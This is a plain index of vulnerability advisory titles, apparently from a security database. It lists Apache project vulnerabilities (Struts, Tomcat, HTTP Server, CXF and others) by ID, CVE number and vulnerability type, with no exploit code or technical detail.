| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
| [95675] Apache Struts Remote Code Execution Vulnerability
| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
| [91736] Apache XML-RPC Multiple Security Vulnerabilities
| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
| [90482] Apache CVE-2004-1387 Local Security Vulnerability
| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
| [86399] Apache CVE-2007-1743 Local Security Vulnerability
| [86397] Apache CVE-2007-1742 Local Security Vulnerability
| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
11395| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
11396| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
11397| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
11398| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
11399| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
11400| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
11401| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
11402| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
11403| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
11404| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
11405| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
11406| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
11407| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
11408| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
11409| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
11410| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
11411| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
11412| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
11413| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
11414| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
11415| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
11416| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
11417| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
11418| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
11419| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
11420| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
11421| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
11422| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
11423| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
11424| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
11425| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
11426| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
11427| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
11428| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
11429| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
11430| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
11431| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
11432| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
11433| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
11434| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
11435| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
11436| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
